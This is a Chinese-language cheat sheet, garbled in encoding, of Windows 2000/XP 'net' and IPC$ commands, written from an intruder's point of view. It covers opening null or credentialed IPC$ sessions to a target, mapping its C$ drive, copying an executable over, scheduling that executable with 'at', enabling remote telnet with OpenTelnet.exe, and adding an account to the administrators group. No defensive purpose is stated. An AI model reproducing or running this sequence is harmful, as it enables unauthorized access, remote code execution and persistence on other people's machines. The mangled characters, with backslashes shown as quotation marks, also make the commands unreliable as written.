1)建立空連接配接:
net use ""IP"ipc$ "" /user:"" (一定要注意:這一行指令中包含了3個空格)
2)建立非空連接配接:
net use ""IP"ipc$ "密碼" /user:"使用者名" (同樣有3個空格)
3)映射預設共享:
net use z: ""IP"c$ "密碼" /user:"使用者名" (即可将對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目标建立了ipc$,則可以直接用IP+盤符+$通路,具體指令 net use z: ""IP"c$
4)删除一個ipc$連接配接
net use ""IP"ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盤,其他盤類推
net use * /del 删除全部,會有提示要求按y确認
3 檢視遠端主機的共享資源(但看不到預設共享)
net view ""IP
4 檢視本地主機的共享資源(可以看到本地的預設共享)
net share
5 得到遠端主機的使用者名清單
nbtstat -A IP
6 得到本地主機的使用者清單
net user
7 檢視遠端主機的目前時間
net time ""IP
8 顯示本地主機目前服務
net start
9 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y
10 映射遠端共享:
net use z: ""IP"baby
此指令将共享名為baby的共享資源映射到z盤
11 删除共享映射
net use * /del /y删除全部
12 向遠端主機複制檔案
copy "路徑"srv.exe ""IP"共享目錄名,如:
copy ccbirds.exe ""*.*.*.*"c 即将目前目錄下的檔案複制到對方c盤内
13 遠端添加計劃任務
at ""ip 時間 程式名,如:
at ""127.0.0.0 11:00 love.exe
注意:時間盡量使用24小時制;在系統預設搜尋路徑(比如system32/)下不用加路徑,否則必須加全路徑
14 開啟遠端主機的telnet
這裡要用到一個小程式:opentelnet.exe,各大下載下傳站點都有,而且還需要滿足四個要求:
1)目标開啟了ipc$共享
2)你要擁有管理者密碼和帳号
3)目标開啟RemoteRegistry服務,使用者就該ntlm認證
4)對WIN2K/XP有效,NT未經測試
指令格式:OpenTelnet.exe ""server account psw NTLM認證方式 port
試例如下:c:">OpenTelnet.exe ""*.*.*.* administrator "" 1 90
15 激活使用者/加入管理者組
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 關閉遠端主機的telnet
同樣需要一個小程式:ResumeTelnet.exe
指令格式:ResumeTelnet.exe ""server account psw
試例如下:c:">ResumeTelnet.exe ""*.*.*.* administrator ""
17 删除一個已建立的ipc$連接配接
net use ""IP"ipc$ /del